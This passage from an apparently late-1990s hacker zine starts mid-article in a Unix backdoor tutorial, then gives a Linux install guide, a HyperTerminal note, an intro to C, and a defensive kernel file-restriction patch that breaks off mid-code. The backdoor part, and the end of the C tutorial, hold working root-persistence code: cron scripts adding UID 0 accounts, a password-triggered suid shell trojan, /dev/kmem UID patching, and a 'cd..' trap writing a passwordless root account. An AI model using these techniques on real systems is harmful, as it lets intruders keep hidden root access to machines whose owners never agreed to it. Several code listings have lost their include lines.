entries to /etc/services & /etc/inetd.conf giving you\n"); printf("a root shell on port 2000. example: telnet 2000\n\n"); printf("4 - Creates a copy of /bin/sh to /tmp/.sh which, whenever\n"); printf("executed gives you a root shell. example:/tmp/.sh\n\n"); printf("5 - Adds an account with uid and gid 0 to the passwd file.\n"); printf("The login is 'mutiny' and there is no passwd."); break; case '8': printf("\nBackhore BETA by Theft\n"); printf("\nhttp://theft.bored.org\n"); printf("theft@cyberspace.org\n\n"); break; default: printf("unknown command: %d\n", cmd); break; } } <--> [Advanced] Crontab is a very powerfull tool for the admin. Cron is used to schedule jobs to do at certain times of the day, month, or year. Can you see where this is going? Because of this, you can make a very powerfull backdoor. With Cron you could make it spawn a program at say 3:00 am in the morning, when the admin is asleep, so you can quickly get in and do as you like and get out before he ever notices, it's possibilities are endless. The root crontab jobs are located in /var/spool/crontab/root and can be manually edited. The Cron lines will look something like this. (1) (2) (3) (4) (5) (6) 0 0 * * 3 /usr/bin/updatedb 1. Minute (0-60) 2. Hour (0-23) 3. Day (1-31) 4. Month (1-12) 5. Day (1-7) 6. is the command (or shell script) to execute. The above shell script is executed on Wednesday. To create a backdoor in cron just add your custom line to /var/spool/crontab/root. You could make a program or shell script in the crontab which checked every week of so if the account we created earlier is still in the /etc/passwd. To start this, you would add this line to /var/spool/crontab/root: 0 0 * * * /usr/bin/retract <++> backdoor/backdoor.sh #!/bin/csh # Is our account still alive in /etc/passwd? We'll see. set evilflag = (`grep eviluser /etc/passwd`) if($#evilflag == 0) then # Is he there? set linecount = `wc -l /etc/passwd` cd # Do this at home. cp /etc/passwd ./temppass # Safety first. @ linecount[1] /= 2 @ linecount[1] += 1 # we only want 2 temp files split -$linecount[1] ./temppass # passwd string optional echo "Meb::0:0:Meb:/root:/bin/sh" >> ./xaa cat ./xab >> ./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd # or whatever it was beforehand rm ./xa* ./temppass echo Done... else endif <--> [Complex] You could of course write a trojan and place it in /bin and make the program create a suid shell if the right arguments are given. This is a very good trojan if utilized correctly. You could also replace a little used program with your trojan in /bin such as dialog to make your trojan even more stealth. Here's a program which if given the correct agrument will create a suid shell in /tmp <++> backdoor/backdoor3.c #include #define pass "triad" #define BUFFERSIZE 6 int main(argc, argv) int argc; char *argv[];{ int i=0; if(argv[1]){ if(!(strcmp(pass,argv[1]))){ system("cp /bin/csh /bin/.swp121"); system("chmod 4755 /bin/.swp121"); system("chown root /bin/.swp121"); system("chmod 4755 /bin/.swp121"); } } printf("372f: Invalid control argument, unable to initialize. Retrying"); for(;i<10;i++){ fprintf(stderr,"."); sleep(1); } printf("\nAction aborted after 10 attempts.\n"); return(0); } <--> [Diverse] Because the kernel keeps it's paremeters in memory, it is possible for you too modify the memory and use it to change you proccess to the UID of 0. To do this, /dev/kmem must be world readable and writable. The program below will seek to your page in the memory and change your UID effectively spawning you a suid root shell. <++> backdoor/kmemthief.c #include #include #include #include #include #include #include #define pass "triad" struct user userpage; long address(), userlocation; int main(argc, argv, envp) int argc; char *argv[], *envp[];{ int count, fd; long where, lseek(); if(argv[1]){ if(!(strcmp(pass,argv[1]))){ fd=(open("/dev/kmem",O_RDWR); if(fd<0){ printf("Cannot read or write to /dev/kmem\n"); perror(argv); exit(10); } userlocation=address(); where=(lseek(fd,userlocation,0); if(where!=userlocation){ printf("Cannot seek to user page\n"); perror(argv); exit(20); } count=read(fd,&userpage,sizeof(struct user)); if(count!=sizeof(struct user)){ printf("Cannot read user page\n"); perror(argv); exit(30); } printf("Current UID: %d\n",userpage.u_ruid); printf("Current GID: %d\n",userpage.g_ruid); userpage.u_ruid=0; userpage.u_rgid=0; where=lseek(fd,userlocation,0); if(where!=userlocation){ printf("Cannot seek to user page\n"); perror(argv); exit(40); } write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage)); execle("/bin/csh","/bin/csh","-i",(char *)0, envp); } } } <--> [The Clumsy] Have you ever been pounding away working a problem with your box and accidently typed "cd.." instead of "cd .." It happens to me because before linux I used windows and MS-Dos for years, and the commands are still stuck in my head. Well every now and then, the admin will type that, wouldn't you want to take advantage of his mistake? What if when he typed cd.. it would trigger your trojan program? Therefore being a semi remote backdoor seeing as you don't have to be logged in the box to trigger it, the truth is, you can! Here's a small program I wrote to take advantage of human error. <++> backdoor/dumb.c /* This program will add a UID 0 account to /etc/passwd when the admin accidently types cd.. Also to cover up itself it will perform the cd action so as the admin would never notice his mistake */ #include #include main() { FILE *fd; fd=fopen("/etc/passwd","a+"); fprintf(fd,"hax0r::0:0::/root:/bin/sh\n"); system("cd"); } <--> Now compile that program and put it somewhere that it looks like it belongs. It is also a good idea if you are doing this from a suid shell to change it's ownership by doing "chown root out" if the programs name was out, changing the group would also be a good idea, whats the reasoning behind this? Well if the admin deos a "ls -alF" and sees a suid root program which owner is an unprivileged account, he's going to figure out it's a backdoor and remove it. Ok, now that you've compiled the program(lets say it was called out in /bin) then you would do this command to "link" cd.. and /bin/out together, do a "ln cd.. /bin/out" and now when the admin makes that vital mistake, you'll have access to the system once again. [Closure] This article was meant to give you a feel for creating, maintaining, and using backdoors as well as removing them. You may use this information any way you like, but be still use your judgement on how you use them and how much it will effect the system and it's performance. For any questions or comments, please send mail to meb_@piratededucation.com. Linux SetUp Tutorial by Psionic =-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=+=-= --Copyrighted material-- This document may be freely distributed but not for commecrial use. Nothing in this docuent may be romved and/or edited. Author's name must be named in document. This document may not be flamed.. =P (it is my first doc...) -- Linux SetUp The setup of the linux os may differ per distro this tut will have the basics that will be the same for almost every linux distro. It will be divided in a couple of really simple steps, this document will not go into configuration of diff. hardware devices etc.. that may differ per machine. Ok the steps will be the following: 1. In case you have no bootdisk, you will have to make one. In case you DO have a bootdisk WTF ARE YOU DOING IN THIS DOC? it is so easy if you already have a bootdisk handy.. Ok I hope you have windows running b'c it is very handy for making the bootdisk (that is the only actual purpose windows has; u can make linux bootdisks pretty easy) Ok; if you have the linux os on cd insert the cd into the cd-rom drive. Otherwise just go to the dir it is in, now insert a formatted floppy disk into our floppy drive (it may also be inserted into the cd-rom drive, but i doubt if that will work) Now select the right image files for the bootup and put them on the floppy, if you don't know what files to pick look for a setup text (hehe) or go to the website, and go to 'how to setup' (hehe again) 2. When you have found the right files, insert the bootdisk and bootup. You may have to disable your C:/ drive in your BIOS first b'c some computers wont read the floppydrive first and they wont boot into the linux setup. 3. Configure everything, and bootup again and, BEHOLD you have linux installed. ( i know it looks all very easy but it needs some practice, and you may want to make a backup of your C:/ drive in case of partitioning etc..) Ok I think was about it, I hope you learned something by reading this. Have fun and Good luck :) Written by Psionic petersen909@hotmail.com ( yeah this is my lame flame adress) You can always talk to me at irc.box5.net channel: #wargames. Cya Hyperterminal trick =-=+=-=+=-=+=-=+=-=+=-=+=-= What's needed ------------------ -- Two computers -- Two phonelines -- Windows HyperTerminal What are we doing? ------------------ We are connecting two computers via a Windows program called "HyperTerminal." This means you can connect your Windows machine with another even if the other end isn't running Windows. The Linux equivalent is minicom. Uses of this. ------------------ This is very useful for transmitting files which are too big to fit on floppy disks, or if you are transmitting from an incompatible media (IE: From a zip disk to a computer which has no zip drive). See if you can find other useful tricks. It's very useful to send files to your friend who aren't on-line, like sending them a patch for a game, etc. What to do now? ---------------------- This goes about double the speed of a normal download. There is only one problem I have found with it, and that is sometimes the computers gets de-synced, (meaning one has sent more than the other can handle and the whole file doesn't get transfered) but that happens very rarely. Well, lets start up your windows hyperterminal program. Set the number to dial accordingly. Now, if you dial that's the easy part, but if you are going to answer you will have to first type the modem init. string which is "ATZ" then you will see *ring* *ring* *ring* and then type the string to make it answer type "ATA" then let it connect. You can chat with your friend but it looks shit, but hey, be thankful for what you get. To send a file click the send file button and use ZMODEM protocol, it's the best. To get a file, just let your bud send it. It will automatically start downloading. Be careful though, disable call waiting and try not to step on your phone cords and stuff. This will de-sync it, and that's a bitch when it happens. When it does de-sync, just abort the send and re-send it, you'll see some weird characters on the screen but its perfectly fine. Well that's its, short huh? Well I'm out, remember to have fun now. ~BurntAsh BurntAsh@juno.com An introduction to C =-=+=-=+=-=+=-=+=-=+=-=+=-= I. Introduction A) Disclaimer B) Introduction C) The Basics of the Basics II. Technical Nonsense A) C Keywords B) The Escape Character III. Getting Down To The Nitty Gritty A) Constants, Variables, and Arithmetic Operators B) Data Types C) Expressions and Statements D) The Basics of A Function IV. Let The Fun Begin A) Writing Your First Program B) Using exit() In A Program C) Using printf() With Operators V. The Shady Side Of It A) Making A SUID Backdoor B) Learning How-To Trojan A SUID VI. Conclusion A) Final Words B) Credits Introduction Disclaimer: I, psylence, the publishers of this text, and anyone else who gave this to you cannot be held responsible should you choose to use it for malicious purposes. Remember hackers make things and crackers break them. Introduction: This is intended to be an introduction to C programming for the Linux operating system, which is just a flavor of Unix. C is a high- level programming language, which means that it's written with words like we speak. In order for your computer to understand the program code it must first be compiled into a binary format. This will not make you into a C guru or anything, but it should at least get you started on your way into the world of geeks and nerds. ;) The Basics: First let's talk about the structure of a program. Before anything else you have your header files. So what exactly are header files you ask? Well the header of a program is basically telling the program that it needs a certain header (.h) file for at least of one of the functions in the program to work. A header file contains preprogrammed functions. If you forget to include stdio.h and use the printf function it won't work because the header for printf (stdio.h) wasn't put in the code. After the header of the program you have the body of the program. The body contains functions, which contain statement blocks, which contain statements, which may contain more functions. Cool eh? At any point in the source code of a program there may be remarks. The beginning of a remark is identified by a forward slash then a star (/*) and the end of a remark is identified by a star then a forward slash (*/). /* This is a remark, this is only a remark! */ Technical Nonsense C Keywords: Keyword Description auto Storage class specifier break Statement case Statement char Type specifier const Storage class modifier continue Statement default Label do Statement double Type specifier else Statement enum Type specifier extern Storage class specifier float Type specifier for Statement goto Statement if Statement int Type specifier long Type specifier register Storage class specifier return Statement short Type specifier signed Type specifier sizeof Operator static Storage class specifier struct Type specifier switch Statement typedef Statement union Type specifier unsigned Type specifier void Type specifier volatile Storage class modifier while Statement The Escape Character (\): You will definitely see the escape character in C. The \ character is the escape character. When the computer sees the \ it knows that a "special" character is coming right after it. Here's a few of the characters that may come after the escape character. Character Description \n The new line character; causes a carriage return and a line feed. \b The backspace character; moves the cursor to the left on space. \r The return character; returns to the beginning of the current line. \t The tab character; moves to the tab stop. \f The form-feed character; goes to the top of a new page. Getting Down To The Nitty Gritty Constants, Variables, and Arithmetic Operators: A constant is a value that *never* changes. Whereas a variable can be used to represent different values. You can think of a variable as a floppy, which is constantly having new data written to it and a constant as a CD that is written one time and isn't ever written over. Defining a variable is quite simple. x = 24; assigns the value 24 to the variable x. x is the variable and 24 is a constant. You can also assign a different value to x later if you like. I don't because I lose track, but if you have the memory for it then more power to you. :) Arithmetic Operators are symbols. + - * / % are all arithmetic operators. You are probably already familiar with some of these. % was a new one for me. % is used to get the remainder of the first operand divided by the second operand. Data Types: Each variable has a data type. Some basic data types are int, char, float, and double. int stands for the integer data type, char stands for the character data type, float stands for the floating point data type, and double is another way to represent the float data type except that it uses 10 digits of precision. Each data type has a format specifier. The int format specifier can be %d or %i. The char format specifier is %c. The float or double format specifier if %f. One way they can be used is in a printf statement. You'll learn more about expressions and statements in the next section. Expressions And Statements: An expression is a combination of constants, variables, and operators used to denote a computation. In the expression a + 5 = c the variable a plus the constant 5 equals the variable c. A statement is a set of instructions ended with a semicolon (;), usually ended with a semicolon anyhow. There are a few functions which don't need a semicolon at the end, such as the for function. An example of a statement is: printf("I can write in c\n"); A group of statements make up a statement block. A statement block starts with an opening brace ({) and ends with a closing brace (}). Here's an example: { printf("see the opening brace?\n"); printf("now look at the closing brace.\n"); } The Basics Of A Function: Well a function may be prewritten and used simply by including the header file for that function or you may write the function yourself. A function is usually in statement form. printf("printf() is a function!"\n); As you can see the function is printf(). The basic function format is the name of the function followed by a pair of left and right parentheses. Arguments to the function are put in the parentheses. The argument to the statement above was "printf() is a function!". The arguments may be different depending on your function, but remember type 'man function name' at the prompt to bring up the manual on that function. Let The Fun Begin Writing Your First Program: We are going to write a simple program to print Hello World! to standard output (your monitor). So open up your favorite editor (usually pico, emacs, or vi come with Linux). The standard C compilers are cc or gcc, gcc comes with most distributions of linux. The syntax is 'gcc file.c -o file'. Make sure that the file with the code has the .c extension or else it *won't* compile. I'll include the shell commands just for the inexperienced. $pico hello.c <++> basicC/hello.c /* This program will print Hello World! */ #include main() { printf("Hello World!\n"); return 0; } <--> $gcc hello.c -o hello Okay that was fun eh? Not really you say?!? Damn you, you ingrate! Just joking, but I promise I'll get into more fun code later in the paper) So let's break down this code. The first thing is the header, #include , which includes the header file stdio. Stdio stands for STandarD Input Output. The double angled brackets (<>) around it mean to look for the header file in a directory other than the current one. If it had double quotes ("") around it then it would mean to look for the header file in the current directory before looking for it elsewhere. The next thing, main(), is the main function of the program. Every C program *must* have a main function. There are only 2 statements inside of the statement block. The printf statement and the return statement. The return statement returns the value 0 in this case, which is a true value. Any other (usually 1) would be a false value. This is usually used to indicate errors in a program. Using exit() In A Program: Above you learned the return is used to return a value to the program. In this example we'll use the exit function instead of the return statement. <++> basicC/exit.c /* This will use the exit function instead of return */ #include #include void main() { printf("Hello again.\n"); exit(0); } <--> So let's break this down real quick and move on. You have the header, but wait... what's this? A new header file?!? Yep, because the exit function uses the header file stdlib. Stdlib stands for STandarD LIBrary. The void data type means that the function won't return a value. The "the" statement block for main has 2 statements in it. The printf statement and the exit statement. Using printf() With Operators: So we've seen how to print to standard output. Now let's try out using putting all the other stuff you learned to use eh? Check out this example: <++> basicC/printf.c #include main() { int y; y = 2 + 5; printf(" 2 + 5 = %d\n", y); return 0; } <--> That one had a bit more meat on it eh? Okay let's break it down. The only header file is stdio. The main function is there (of course). Inside of the statement block there are 4 statements. int y, y = 2 +5, printf, and the return statement. int y; gives the variable y the int data type. y = 2 + 5 assigns the value of 2 + 5 to the variable y. The %d in the printf statement means that the %d will be a integer. The \n means newline. The y after the , in the printf statement means that the integer value of %d is going to be y. Then the value 0 is returned to the function. Now take a look at the character format specifier in a program. Check out this example: <++> basicC/printf2.c #include main() { char c1, c2; c1 = 'h'; c2 = 'i'; printf("%c%c\n", c1, c2); return 0; } <--> By this time I bet you probably have the hang of it. So I'll just breeze over this one. Header, main function, the data type of c1 and c2 is char, the character h is assigned to c1 and i is assigned to c2. hi is printed to standard output and the value 0 (true) is returned. The Shady Side Of It Making A SUID Backdoor: Well first off I'll explain what a SUID is. SUID stands for Set Used ID. A Unix machine identifies each user with a number. The root UID is 0. Just as with UID there is also a GID, which is your Group ID. With that in mind let's see a program that'll spawn a rootshell for you. muhahaha :P <++> basicC/suid.c #include #include main() { setgid(0); setegid(0); setuid(0); seteuid(0); printf("Root Be Thy Name\n"); execl("/bin/sh", 0); return 0; } <--> Okay, okay, now that will give you a root shell if the permissions on the compiled binary file are set correctly, but I'll leave that part out so that I won't be harassed by people for teaching people stuff like that. The setgid, setegid, setuid, and seteuid functions are used to set the GID, Effective GID, UID, and Effective UID. The execl function executes the argument ("/bin/sh"). So it made a shell. You already know that return just returns a value to the function. To see details check out the manuals yourself ;) Learning How-To Trojan A SUID: So you learned briefly about what SUID's are and the functions that go along with them. Now obviously a root SUID program is slightly obvious so to further your shady intentions you could get the source to a SUID that's already on the machine and add in some code to spawn you a shell. This can be done with as few as 10 lines of additional code. Conclusion Final Words: I know I've left out some stuff and that there's much more to be said on the subject of C programming, but this was only supposed to be an introduction. I may write another paper on it, but don't hold your breath ;) Basically with what you've learned here you can at least get your math homework done. Or make a nifty backdoor. If you we're disappointed with this paper I don't really care. :) Please redirect all flames to /dev/null or /dev/echo. Thanks and have fun! Credits: I got to give thanks to mcp.com for the personal bookshelf. Thanks to Sams for "C In 24 Hours" and "C In 21 Days". Thanks to everyone who's put up with my questions on the subject. A big thanks to overdose001 for proof reading this for me. Greets go out to xphantom, Remmy, all of tg0d, irishrose, lamagra, GrimKnight, and everyone else. -=- Very cool informative zine, unlike so many others especially for a number one issue, quite impressive - two "Kevin's" up! - Ed @HWA 157.0 Paper:Some Extra Security In The Linux Kernel - Auditfile by {} ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Submitted by {} Some Extra Security In The Linux Kernel - Auditfile a paper by Frank van Vliet alias {} karin@root66.nl.eu.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ RooT66 http://root66.nl.eu.org ShellOracle http://www.shelloracle.cjb.net ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ First read: Kernel Hackers Guide -http://www.linuxhq.com/guides The Linux Kernel -http://www.linuxhq.com/guides The Linux Kernel Module Programming Guide -http://www.linuxhq.com/guides The tarball can be downloaded from http://root66.nl.eu.org/karin/auditfile-0.39.tar.gz ----------[ about me I'm Frank van Vliet alias {}, networking/security/linuxfreak and leader of RooT66 (http://root66.nl.eu.org) You can contact me on karin@root66.nl.eu.org ----------[ introduction There is no such thing as 100% security, so why act like you are safe by downloading the latest patches. 'My script automatically downloads the latest patches and installs them, my box is secure' - right. Why not flip over and say, every process is insecure. Every process got a goal, lets give it permission to accomplish that goal and restrict it as much as possible. Auditfile is a securitypatch i wrote some time ago giving the oppertunity to restrict the usage of files per process, so we can say -Our httpserver can only read: /usr/local/apache/conf/* /usr/local/apache/htdocs* /usr/local/apache/cgi-bin/* write: /usr/local/apache/logs/* both read and write: /usr/local/apache/cgi-bin/guestbook_database/* ----------[ how to add those security options ------------------[ task_struct Every process got its own task_struct in the global array of current tasks (task_list). This task_struct contains things like filename, environment, uid, gid, euid, and so on. This seems to be the right place to add a char *auditfile; // pointing to memory where rules for auditfile are put int auditfile_len; // integer telling size of memory used for rules for auditfile We can find struct task_struct in /usr/src/linux/include/linux/sched.h so add that char * and that int to the task_struct. ------------------[ How should this memory look like? I came up with the following map of the memory Flags: read = 1 write = 2 both read and write = 3 sprintf(buffer_for_auditfile_rules "\0%c%s\0%c%s\0%c%s\0%c%s.....\0\0", flag, match, flag, match, flag, match, flag, match ....."); Example: read /usr/bin/* read /lib/* read /etc* both /tmp* write /tmp/write/* would look like \0\1/usr/bin/*\0\1/lib/*\0\1/etc*\0\3/tmp*\0\2/tmp/write/*\0\0 ------------------[ how do we get this memory attached to new processes I wrote a little kernel module that allocates memory, fills it with rules, and attaches that memory to the task_struct_of_process_to_edit.auditfile, here it is: -----[ WARNING ADULT CONTENTS ]----- #include #include #if CONFIG_MODVERSIONS==1 #define MODVERSIONS #include #endif #include #include #include #ifndef KERNEL_VERSION #define KERNEL_VERSION(a,b,c) (((a) << 16) + ((b) << 8) + (c)) #endif /*KERNEL_VERSION*/ #if LINUX_VERSION_CODE>=KERNEL_VERSION(2,2,0) #include #endif int pid=0; char *command; char *parm; char parsedrule[0xFFFF]; // sorry very ugly, but to lazy to fix ((: char *parsedrulereal; MODULE_PARM(pid, "i"); MODULE_PARM(command, "s"); MODULE_PARM(parm, "s"); int init_module() { int i=0,j=0,h=0; struct task_struct *p; read_lock(&tasklist_lock); for_each_task(p) { if ((p->pid)==pid) { switch (parm[i]) { case 'r': parsedrule[j] = 0; parsedrule[j+1] = 1; j+=2; break; case 'w': parsedrule[j] = 0; parsedrule[j+1] = 2; j+=2; break; case 'b': parsedrule[j] = 0; parsedrule[j+1] = 3; j+=2; break; } for (i=1;h!=1;i++) { switch (parm[i]) { case 0: h = 1; break; case ' ': switch (parm[i+1]) { case 'r': parsedrule[j] = 0; parsedrule[j+1] = 1; j+=2; i++; break; case 'w': parsedrule[j] = 0; parsedrule[j+1] = 2; j+=2; i++; break; case 'b': parsedrule[j] = 0; parsedrule[j+1] = 3; j+=2; i++; break; } break; default: parsedrule[j] = parm[i]; j++; break; } } parsedrule[j] = 0; parsedrule[j+1] = 0; parsedrulereal = (char *) kmalloc(j + 2, GFP_KERNEL); for (h=0;hauditfile_len > 0) { kfree(p->auditfile); } p->auditfile = parsedrulereal; p->auditfile_len = (j + 2); } } read_unlock(&tasklist_lock); return(0); } void cleanup_module() { } -----[ END OF ADULT CONTENTS ]----- This module attaches memory to a pid, you should load it with insmod auditfile.o pid=PID parm="r/usr/bin/* r/etc/* r/lib/* b/tmp* w/tmp/write/*" I made a couple of tools to automate this when a process is started, you can find them in auditfile-0.39.tar.gz ------------------[ copying the char *auditfile and int auditfile_len to new processes Ofcourse we want childprocesses of the processes we restricted to run with the same auditfile rules so we add a couple of lines to /usr/src/linux/kernel/fork.c -----[ WARNING ADULT CONTENTS ]----- int do_fork(unsigned long clone_flags, unsigned long usp, struct pt_regs *regs) { int nr; int retval = -EINVAL; struct task_struct *p; struct semaphore sem = MUTEX_LOCKED; /* * Disallow unknown clone(2) flags, as well as CLONE_PID, unless we are * the boot up thread. * * Avoid taking any branches in the common case. */ if (clone_flags & (-(signed long)current->pid >> (sizeof(long) * 8 - 1)) & ~(unsigned long)(CSIGNAL | CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SIGHAND | CLONE_PTRACE | CLONE_VFORK)) goto fork_out; current->vfork_sem = &sem; retval = -ENOMEM; p = alloc_task_struct(); if (!p) goto fork_out; *p = *current; /* INCLUDED FOR AUDITFILE */ (char *)p->auditfile = 0; p->auditfile_len = 0; /* END OF INCLUDED FOR AUDITFILE */ down(¤t->mm->mmap_sem); lock_kernel(); retval = -EAGAIN; if (p->user) { if (atomic_read(&p->user->count) >= p->rlim[RLIMIT_NPROC].rlim_cur) goto bad_fork_free; atomic_inc(&p->user->count); } { struct task_struct **tslot; tslot = find_empty_process(); if (!tslot) goto bad_fork_cleanup_count; p->tarray_ptr = tslot; *tslot = p; nr = tslot - &task[0]; } if (p->exec_domain && p->exec_domain->module) __MOD_INC_USE_COUNT(p->exec_domain->module); if (p->binfmt && p->binfmt->module) __MOD_INC_USE_COUNT(p->binfmt->module); p->did_exec = 0; p->swappable = 0; p->state = TASK_UNINTERRUPTIBLE; copy_flags(clone_flags, p); p->pid = get_pid(clone_flags); /* * This is a "shadow run" state. The process * is marked runnable, but isn't actually on * any run queue yet.. (that happens at the * very end). */ p->state = TASK_RUNNING; p->next_run = p; p->prev_run = p; p->p_pptr = p->p_opptr = current; p->p_cptr = NULL; init_waitqueue(&p->wait_chldexit); p->vfork_sem = NULL; p->sigpending = 0; sigemptyset(&p->signal); p->sigqueue = NULL; p->sigqueue_tail = &p->sigqueue; spin_lock_init(&p->priv_lock); p->priv = 0; p->ppriv = current->priv; p->it_real_value = p->it_virt_value = p->it_prof_value = 0; p->it_real_incr = p->it_virt_incr = p->it_prof_incr = 0; init_timer(&p->real_timer); p->real_timer.data = (unsigned long) p; p->leader = 0; /* session leadership doesn't inherit */ p->tty_old_pgrp = 0; p->times.tms_utime = p->times.tms_stime = 0; p->times.tms_cutime = p->times.tms_cstime = 0; #ifdef __SMP__ { int i; p->has_cpu = 0; p->processor = current->processor; /* ?? should we just memset this ?? */ for(i = 0; i < smp_num_cpus; i++) p->per_cpu_utime[i] = p->per_cpu_stime[i] = 0; spin_lock_init(&p->sigmask_lock); } #endif p->lock_depth = -1; /* -1 = no lock */ p->start_time = jiffies; retval = -ENOMEM; /* copy all the process information */ if (copy_files(clone_flags, p)) goto bad_fork_cleanup; if (copy_fs(clone_flags, p)) goto bad_fork_cleanup_files; if (copy_sighand(clone_flags, p)) goto bad_fork_cleanup_fs; if (copy_mm(nr, clone_flags, p)) goto bad_fork_cleanup_sighand; retval = copy_thread(nr, clone_flags, usp, p, regs); if (retval) goto bad_fork_cleanup_mm; p->semundo = NULL; /* INCLUDED FOR AUDITFILE */ if (current->auditfile_len > 0) { p->auditfile_len = current->auditfile_len; (char *)p->auditfile = (char *) kmalloc(p->auditfile_len, GFP_KERNEL); if ((char *)p->auditfile == NULL) { printk(KERN_INFO "Warning: out of mem to add auditfile rules to process %d\n", p->pid); p->auditfile_len = 0; } else { memcpy(p->auditfile, current->auditfile, current->auditfile_len); } } /* END OF INCLUDED FOR AUDITFILE */ /* ok, now we should be set up.. */ p->swappable = 1; p->exit_signal = clone_flags & CSIGNAL; p->pdeath_signal = 0; /* * "share" dynamic priority between parent and child, thus the * total amount of dynamic priorities in the system doesnt change, * more scheduling fairness. This is only important in the first * timeslice, on the long run the scheduling behaviour is unchanged. */ current->counter >>= 1; p->counter = current->counter; /* * Ok, add it to the run-queues and make it * visible to the rest of the system. * * Let it rip! */ retval = p->pid; if (retval) { write_lock_irq(&tasklist_lock); SET_LINKS(p); hash_pid(p); write_unlock_irq(&tasklist_lock); nr_tasks++; p->next_run = NULL; p->prev_run = NULL; wake_up_process(p); /* do this last */ } ++total_forks; bad_fork: unlock_kernel(); up(¤t->mm->mmap_sem); fork_out: if ((clone_flags & CLONE_VFORK) && (retval > 0)) down(&sem); return retval; bad_fork_cleanup_mm: mmput(p->mm); p->mm = NULL; bad_fork_cleanup_sighand: exit_sighand(p); bad_fork_cleanup_fs: exit_fs(p); /* blocking */ bad_fork_cleanup_files: exit_files(p); /* blocking */ bad_fork_cleanup: if (p->exec_domain && p->exec_domain->module) __MOD_DEC_USE_COUNT(p->exec_domain->module); if (p->binfmt && p->binfmt->module) __MOD_DEC_USE_COUNT(p->binfmt->module); add_free_taskslot(p->tarray_ptr); bad_fork_cleanup_count: if (p->user) free_uid(p); bad_fork_free: free_task_struct(p); goto bad_fork; } -----[ END OF ADULT CONTENTS ]----- Besides editing the fork, we should make it init a char *auditfile and a int auditfile_len on the first process (the process of init) so in /usr/src/linux/kernel/init.c we add something 2 -----[ WARNING ADULT CONTENTS ]----- static int init(void * unused) { lock_kernel(); do_basic_setup(); /* * Ok, we have completed the initial bootup, and * we're essentially up and running. Get rid of the * initmem segments and start the user-mode stuff.. */ free_initmem(); unlock_kernel(); /* INCLUDED FOR AUDITFILE */ (char *)current->auditfile = 0; current->auditfile_len = 0; /* END OF INCLUDED FOR AUDITFILE */ -----[ END OF ADULT CONTENTS ]----- ------------------[ destroying memory when process dies Because this is arch specific and i use an x86 i only edit /usr/src/linux/arch/i386/kernel/process.c -----[ WARNING ADULT CONTENTS ]----- void free_task_struct(struct task_struct *p) { /* INCLUDED FOR AUDITFILE */ if (p->auditfile_len > 0) { kfree(p->auditfile); } { /* END OF INCLUDED FOR AUDITFILE */ #ifdef EXTRA_TASK_STRUCT int index = task_struct_stack_ptr+1; if (index < EXTRA_TASK_STRUCT) { task_struct_stack[index] = p; task_struct_stack_ptr = index; } else #endif free_pages((unsigned long) p, 1); /* INCLUDED FOR AUDITFILE */ } /* END OF INCLUDED FOR AUDITFILE */ } -----[ END OF ADULT CONTENTS ]----- ------------------[ check for auditfile rules when a process wants to read/write to a file When a process opens a file, it calls the sys_open function, and this function calls (via via) open_namei() This function looks this on 2.2.12: -----[ WARNING ADULT CONTENTS ]----- /* * open_namei() * * namei for open - this is in fact almost the whole open-routine. * * Note that the low bits of "flag" aren't the same as in the open * system call - they are 00 - no permissions needed * 01 - read permission needed * 10 - write permission needed * 11 - read/write permissions needed * which is a lot more logical, and also allows the "no perm" needed * for symlinks (where the permissions are checked later). */ struct dentry * open_namei(const char * pathname, int flag, int mode) { int acc_mode, error; struct inode *inode; struct dentry *dentry; mode &= S_IALLUGO & ~current->fs->umask; mode |= S_IFREG; dentry = lookup_dentry(pathname, NULL, lookup_flags(flag)); if (IS_ERR(dentry)) return dentry; acc_mode = ACC_MODE(flag); if (flag & O_CREAT) { struct dentry *dir; if (dentry->d_inode) { error = -EEXIST; if (flag & O_EXCL) goto exit; #ifdef CONFIG_SECURE_FIFO if (!S_ISFIFO(dentry->d_inode->i_mode)) goto nocreate; #else goto nocreate; #endif } dir = lock_parent(dentry); if (!check_parent(dir, dentry)) { /* * Really nasty race happened. What's the * right error code? We had a dentry, but * before we could use it it was removed * by somebody else. We could just re-try * everything, I guess. * * ENOENT is definitely wrong. */ error = -ENOENT; unlock_dir(dir); goto exit; } #ifdef CONFIG_SECURE_FIFO /* * Don't write to FIFOs that we don't own in +t directories, * unless the FIFO is owned by root. */ if ((inode = dentry->d_inode)) if (S_ISFIFO(inode->i_mode) && !(flag & O_EXCL) && (dir->d_inode->i_mode & S_ISVTX) && inode->i_uid && current->fsuid != inode->i_uid) { security_alert("denied writing FIFO of %d.%d " "by UID %d, EUID %d, process %s:%d", "writes into a FIFO denied", inode->i_uid, inode->i_gid, current->uid, current->euid, current->comm, current->pid); error = -EACCES; unlock_dir(dir); goto exit; } #endif /* * Somebody might have created the file while we * waited for the directory lock.. So we have to * re-do the existence test. */ if (dentry->d_inode) { error = 0; if (flag & O_EXCL) error = -EEXIST; } else if ((error = may_create(dir->d_inode, dentry)) == 0) { if (!dir->d_inode->i_op || !dir->d_inode->i_op->create) error = -EACCES; else { DQUOT_INIT(dir->d_inode); error = dir->d_inode->i_op->create(dir->d_inode, dentry, mode); /* Don't check for write permission, don't truncate */ acc_mode = 0; flag &= ~O_TRUNC; } } unlock_dir(dir); if (error) goto exit; } nocreate: error = -ENOENT; inode = dentry->d_inode; if (!inode) goto exit; error = -ELOOP; if (S_ISLNK(inode->i_mode)) goto exit; error = -EISDIR; if (S_ISDIR(inode->i_mode) && (flag & FMODE_WRITE)) goto exit; error = permission(inode,acc_mode); if (error) goto exit; /* * FIFO's, sockets and device files are special: they don't * actually live on the filesystem itself, and as such you * can write to them even if the filesystem is read-only. */ if (S_ISFIFO(inode->i_mode) || S_ISSOCK(inode->i_mode)) { flag &= ~O_TRUNC; } else if (S_ISBLK(inode->i_mode) || S_ISCHR(inode->i_mode)) { error = -EACCES; if (IS_NODEV(inode)) goto exit; flag &= ~O_TRUNC; } else { error = -EROFS; if (IS_RDONLY(inode) && (flag & 2)) goto exit; } /* * An append-only file must be opened in append mode for writing. */ error = -EPERM; if 